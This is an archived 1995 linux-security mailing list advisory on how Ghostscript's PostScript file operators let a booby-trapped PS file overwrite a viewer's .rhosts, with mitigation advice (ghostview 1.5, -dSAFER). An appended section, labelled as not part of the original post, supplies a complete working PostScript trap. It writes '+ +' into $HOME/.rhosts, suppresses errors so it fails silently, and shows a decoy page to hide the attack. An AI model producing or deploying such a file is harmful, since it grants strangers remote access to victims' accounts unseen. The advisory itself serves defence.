[270] in linux-security and linux-alert archive


Hacking a site with Postscript

daemon@ATHENA.MIT.EDU (Olaf Kirch)
Mon Jul 3 19:56:24 1995

From: okir@monad.swb.de (Olaf Kirch)
To: linux-security@tarsier.cv.nrao.edu
Date: Mon, 3 Jul 1995 18:04:20 +0200 (MET DST)

-----BEGIN PGP SIGNED MESSAGE-----


Hi all,

The following should concern all you web users out there:

Starting with Level 2, Postscript implements a number of file operators
that allow you to read and write arbitrary files. Newer versions of 
ghostscript implement these operators. (I checked 2.6.1, and it does.
I don't know about 2.5 and earlier, though). To round off the picture,
it also features a non-standard operator named getenv to read things
like your HOME directory from your environment.

This can be exploited to open up your system by writing to your .rhosts
file. While this is not so dangerous with postscript files distributed
via FTP, MIME-aware WWW clients make planting these traps on the Web
all too easy. Needless to say, you can configure your HTTP daemon to
log all accesses, so tracking the downloaders of this infected PS file
is simple.

While ghostscript itself has a switch to disable file writing (command-line
option -dSAFER), this is not enabled by ghostview 1.4 by default.
On the other hand, ghostview 1.5 turns this on by default (and has its
own pair of commandline options to toggle this behavior).

To be safe from this type of attack, make sure you run ghostview 1.5.
Also make sure that the -safer option is not being turned off in the
resource file (the resource name is *safer).

There is now also a bulletin by DFNCERT, the German branch of CERT.
If there's any interest in this, and if I find the time, I may send out
a translation to linux-security.

We will also release a somewhat briefer description of this hole to
linux-alert.

Olaf
-- 
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
             For my PGP public key, finger okir@brewhq.swb.de.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCUAgUBL/gU9uFnVHXv40etAQHO1AP4gd25k2jYwt6IyuuptO0D8afZC9CfGeT4
u9PpyED/99QVJjw/NXIslsS76abC+7nL+mI0tgwgjqW7KaXUqUIpYMP+FYozwhlX
QUfaPlMHag0+VFr3xrL555Il4Appf4Ccu52COwp8u+2wtTq/66H8p+2MSzW4GQx1
ZwftvSgdWQ==
=uLnh
-----END PGP SIGNATURE-----
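The trap the message describes, written out as an added example (this is not code from the original post, from Olaf Kirch, or from the DFN-CERT bulletin): a Level 2 document that uses Ghostscript's getenv extension to find $HOME, opens $HOME/.rhosts with the file operator and appends a "+ +" line, then draws an innocuous page. The strcat helper, the file name, the use of append ("a") access and the mark/stopped/cleartomark wrapper (which swallows any error so that a viewer running with -dSAFER still just shows the page) are my choices, not anything the post specifies.

```postscript
%!PS-Adobe-2.0
% Added example: a .rhosts-writing PostScript trap of the kind described
% in the message above. Assumes a Level 2 interpreter with the Ghostscript
% getenv operator and an account whose $HOME is writable by the viewer.

% strcat: s1 s2 -> s1s2  (helper written for this example)
/strcat {
  2 copy length exch length add string   % s1 s2 new
  dup 0 4 index putinterval              % copy s1 into new at offset 0
  dup 3 index length 3 index putinterval % copy s2 into new after s1
  3 1 roll pop pop                       % leave only the new string
} def

% The payload. Everything is bracketed by mark ... stopped cleartomark so
% that a failure (for example invalidfileaccess when the interpreter runs
% with -dSAFER) is silently discarded and the operand stack is cleaned up:
% the victim sees a normal page either way.
mark {
  (HOME) getenv {                   % getenv pushes (value) true, or false
    (/.rhosts) strcat               % $HOME/.rhosts
    (a) file                        % Level 2: open for append ("w" would clobber)
    dup (+ +\n) writestring         % trust every user on every host
    closefile
  } if
} stopped cleartomark

% Decoy content so the document renders as something harmless.
/Helvetica findfont 24 scalefont setfont
72 700 moveto (Hello) show
showpage
```

To see the difference -dSAFER makes without touching a real account, point HOME at a scratch directory and run the file twice: `HOME=/tmp/scratch gs -dNODISPLAY -q trap.ps` creates /tmp/scratch/.rhosts, while `HOME=/tmp/scratch gs -dSAFER -dNODISPLAY -q trap.ps` does not (the file operator fails inside the stopped block and nothing is written). The same test run through your viewer tells you whether ghostview is actually passing -dSAFER through; if a .rhosts turns up, check the viewer version and look for a `*safer: false` entry in the X resources the post mentions.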
